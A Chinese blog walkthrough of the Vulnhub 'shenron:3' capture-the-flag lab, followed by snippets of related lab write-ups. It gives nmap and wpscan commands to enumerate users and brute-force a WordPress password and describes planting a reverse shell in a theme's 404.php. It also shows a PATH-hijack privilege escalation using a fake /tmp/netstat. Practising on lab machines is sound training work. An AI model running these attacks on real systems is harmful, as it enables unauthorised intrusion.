首页 > 其他分享 >Vulnhub: shenron:3靶机

Vulnhub: shenron:3靶机

时间:2023-07-31 16:34:43浏览次数:46  
标签:tmp http -- 192.168 netstat shenron Vulnhub 靶机

kali:192.168.111.111

靶机:192.168.111.171

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.171

image

修改hosts后访问目标80端口,发现是wordpress

image

wpscan收集目标用户,爆破出密码:iloverockyou

wpscan --url http://shenron/ -e u
wpscan --url http://shenron/ -U admin -P /usr/share/wordlists/rockyou.txt

image

image

登录后修改目标源码拿shell

image

修改后访问http://shenron/wp-content/themes/twentyeleven/404.php获得反弹shell

image

提权

shenron用户的密码也是iloverockyou

image

在shenron用户家目录下发现network程序,执行后发现该程序会执行netstat命令,修改环境变量提权

echo '/bin/bash' > /tmp/netstat
chmod 777 /tmp/netstat
export PATH=/tmp:$PATH
./network

image

image

flag

image

标签:tmp,http,--,192.168,netstat,shenron,Vulnhub,靶机
From: https://www.cnblogs.com/ctostm/p/17593784.html

相关文章

  • Vulnhub: hacksudo: search靶机
    kali:192.168.111.111靶机:192.168.111.170信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.17080端口目录爆破feroxbuster-k-d1--urlhttp://192.168.111.170-w/opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lower......
  • DC_4靶机的简单复现
    DC_41.nmapkali的IP:192.168.40.148扫描同网段的其他IP:nmap-sP192.168.40.148/24扫描结果:先IP后mac地址再通过查看DC_4的mac地址,可得DC_4靶机的IP:192.168.40.163全盘扫描:nmap-A192.168.40.163-p1-65535-oNnmap.A-A:该选项表示使用"Aggressive"扫......
  • Vulnhub: Coffee Addicts:1靶机
    kali:192.168.111.111靶机:192.168.111.158信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.158访问80端口提示添加域名到hosts文件目录爆破,发现wordpress目录feroxbuster-k-d1--urlhttp://coffeeaddicts.thm-w/opt/zidian/SecLists-2......
  • Vulnhub: HackathonCTF: 2靶机
    kali:192.168.111.111靶机:192.168.111.147信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.147ftp存在匿名登陆,其中存在字典文件80端口目录爆破feroxbuster-k-d1--urlhttp://192.168.111.147-w/opt/zidian/SecLists-2022.2/Discover......
  • Vulnhub之Dhanush靶机测试过程
    Dhanush识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/dhanush]└─$sudonetdiscover-ieth1-r192.168.187.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts......
  • Vulnhub: Hackable:II靶机
    kali:192.168.111.111靶机:192.168.111.142信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.142网站的files目录ftp存在匿名登录,所在目录为网站的files目录ftp上传反弹shell提权目标根目录下的.runme.shmd5解密后切换到shrek用户s......
  • vulnhub-BossPlayersCTF
    vulnhub-BossPlayersCTF目标IP:192.168.1.103官方难度:简单攻击机器:macOS+kali混搭信息收集端口扫描开放端口扫描nmap-sT-T4-p-192.168.1.103扫描结果StartingNmap7.93(https://nmap.org)at2023-06-0423:10CSTNmapscanreportfor192.168.1.103Hosti......
  • Vulnhub_Zico2_wp
    前言靶机下载地址:https://download.vulnhub.com/zico/zico2.ova主机探测nmap-sn192.168.20.0/24192.168.20.147为靶机ip详细信息扫描nmap-A-p-192.168.20.147点击查看扫描结果┌──(root㉿kali)-[/home/kali/Desktop]└─#nmap-A-p-192.168.20.147Starting......
  • Vulnhub_Acid_wp
    前言靶机下载地址:https://download.vulnhub.com/acid/Acid.rar靶机探测nmap-sn192.168.20.0/24192.168.20.146是新出现得ip所以为靶机ip详细信息扫描nmap-A-p-192.168.20.146漏洞扫描nmapnmap-p33447--script=vuln192.168.20.146niktonikto-h192.168.20.......
  • Vulnhub: EvilBox:One靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130secret目录爆破feroxbuster-k-d1--urlhttp://192.168.111.130/secret/-w/opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-li......